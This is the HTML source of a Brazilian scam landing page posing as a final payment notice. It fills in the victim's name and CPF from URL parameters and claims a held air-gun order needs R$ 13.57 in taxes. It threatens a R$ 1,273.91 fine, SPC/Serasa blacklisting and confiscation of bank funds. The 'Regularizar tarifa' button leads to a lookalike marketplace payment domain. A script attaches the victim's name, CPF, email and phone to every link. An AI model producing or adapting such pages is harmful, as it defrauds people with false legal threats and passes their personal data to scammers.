<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <script>
  window.pixelId = "6798235bfdabeca0a53d1e6f";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script
  src="../../cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-subids
  async
  defer
></script>
<script>
    // Função para obter os parâmetros da URL
    function getQueryParams() {
        const params = new URLSearchParams(window.location.search);
        return {
            name: params.get('name') || '',
            document: params.get('document') || '',
            email: params.get('email') || '',
            telephone: params.get('telephone') || '' // Adiciona o telefone
        };
    }

    // Função para adicionar parâmetros à URL de todos os botões com href
    document.addEventListener('DOMContentLoaded', function () {
        // Seleciona todos os botões com atributo href
        const buttons = document.querySelectorAll('a[href]'); 

        buttons.forEach(function (button) {
            button.addEventListener('click', function (e) {
                // Obtém os parâmetros da URL
                const queryParams = getQueryParams();
                const urlParams = new URLSearchParams(queryParams).toString();

                // Atualiza o href do botão para incluir os parâmetros
                const currentHref = button.getAttribute('href'); // Obtém o href atual
                const separator = currentHref.includes('?') ? '&' : '?'; // Adiciona '&' se já houver parâmetros
                button.setAttribute('href', `${currentHref}${separator}${urlParams}`);
            });
        });
    });
</script>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alerta de Pagamento</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f9f9f9;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            width: 100%;
            max-width: 400px;
            background-color: #fff;
            border: 1px solid #ccc;
            border-radius: 10px;
            padding-bottom: 20px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        }
        .areaTitular {
            padding: 20px;
            font-weight: bolder;
        }
        .areaTitular h1 {
            font-size: 22px; /* Aumentei o tamanho da fonte */
        }
        .flag {
            display: flex;
            justify-content: center;
            background: linear-gradient(45deg, #D32F2F, #F44336);
            border-radius: 5px;
            padding: 5px;
            color: white;
        }
        .atencao {
            text-align: center;
            padding: 20px;
            font-size: 14px;
            color: black;
        }
        .atencao span {
            color: red;
            font-weight: bold;
        }
        .produto-retido {
            display: flex;
            align-items: center;
            gap: 10px;
            font-size: 12px;
            color: #333;
            padding: 10px 20px;
        }
        .icone {
            width: 12px;
            height: 12px;
            background-color: orange;
            border-radius: 50%;
        }
        .texto {
            line-height: 1.5;
        }
        .texto strong {
            text-transform: uppercase;
        }
        .item {
            display: flex;
            justify-content: space-between;
            padding: 10px 0;
            border-bottom: 1px solid #eee;
        }
        .item:last-child {
            border-bottom: none;
        }
        .total {
            display: flex;
            justify-content: space-between;
            font-weight: bold;
            color: red;
            margin-top: 10px;
        }
        .botao-regularizar {
            display: block;
            width: calc(100% - 20px);
            max-width: 300px;
            text-align: center;
            background-color: #28a745;
            color: #fff;
            padding: 15px;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            margin: 20px auto;
            text-decoration: none;
        }
        .tempo-restante {
            text-align: center;
            color: #555;
            font-size: 12px;
            margin-bottom: 10px;
        }
        .tempo-restante span {
            font-weight: bold;
        }
        .email {
            text-align: center;
            font-size: 12px;
            color: #888;
            margin-top: 10px;
        }
        .banner {
            width: 100%; /* Ajuste para 70% */
            display: block;
            margin-left: auto;
            margin-right: auto;
            margin-top: 20px; /* Margem de 20px acima do banner */
            border-radius: 10px 10px 0 0;
        }

        .containerPre {
            padding: 8px;
        }

        /* Responsividade */
        @media (max-width: 480px) {
            .areaTitular {
                font-size: 14px;
            }
            .flag h1 {
                font-size: 12px;
            }
            .botao-regularizar {
                font-size: 14px;
                padding: 10px;
            }
            .atencao {
                font-size: 12px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <picture>
            <source srcset="https://i.postimg.cc/B6WF9HYQ/Dados-do-autor-1.png" type="image/webp">
            <img class="banner" src="banner.jpg" alt="Banner" loading="lazy">
        </picture>
        
        <div class="areaTitular">
            <h1>Titular:</h1>
            <span id="titular-name" class="highlight" style="font-size: 18px;">Nome não informado</span> <!-- Aumentei o tamanho da fonte do nome -->
            <br>
            <span style="font-weight: 100;" id="cpf"><strong>CPF:</strong> Documento não informado</span> <!-- Adicionei "CPF:" -->
        </div>
        <div class="flag">
            <h1 style="font-size: 15px;">SUJEITO A MULTA DE R$ 1.273,91</h1>
        </div>
        <div class="atencao">
    <p>
        <span style="font-weight: lighter;">Caso o pagamento do tributo não seja realizado para o despacho do seu pedido, 
                    uma multa será registrada no SPC/Serasa<br><br></span>
    </p>
    <p><strong> Último aviso para:</strong> <span id="atencao-titular">Nome não informado</span></p>
    <div>
        <p><strong> Produto retido:</strong> <span>ARMA DE PRESSÃO</span></p>
    </div>
</div>


        <div class="containerPre">
            <div class="item">
                <span>Processamento Eletrônico</span>
                <span>R$ 4,25</span>
            </div>
            <div class="item">
                <span>ICMS</span>
                <span>R$ 3,32</span>
            </div>
            <div class="item">
                <span>Contribuição Federal</span>
                <span>R$ 6,00</span>
            </div>
            <div class="total">
                <span>Total:</span>
                <span>R$ 13,57</span>
            </div>
            <a href="https://pay.seguroo-ml.shop/5pjw3RobVllZ2lQ" class="botao-regularizar">Regularizar tarifa</a>
            <div class="tempo-restante">
                <span>Tempo Restante:</span> Não regularizar resultará em negativação, e <br>
                <span>confisco do dinheiro em conta bancária.</span>
            </div>
            <div class="email" id="email">
                Invalido
            </div>
        </div>
    </div>

    <script>
        function formatCPF(cpf) {
            cpf = cpf.replace(/\D/g, '');
            if (cpf.length !== 11) {
                return 'CPF inválido';
            }
            return cpf.replace(/(\d{3})(\d{3})(\d{3})(\d{2})/, '$1.$2.$3-$4');
        }

        function getURLParams() {
            const params = new URLSearchParams(window.location.search);
            return {
                name: params.get('name') || 'Nome não informado',
                documentId: params.get('document') || 'Documento não informado',
                email: params.get('email') || 'Email não informado',
                telephone: params.get('telephone') || 'Telefone não informado'
            };
        }

        function updatePageContent() {
            const { name, documentId, email, telephone } = getURLParams();
            const formattedCPF = formatCPF(documentId);

            document.getElementById('titular-name').textContent = name;
            document.getElementById('cpf').textContent = `CPF: ${formattedCPF}`;
            document.getElementById('email').textContent = email;
            document.getElementById('atencao-titular').textContent = name;
        }

        updatePageContent();
    </script>
</body>
</html>
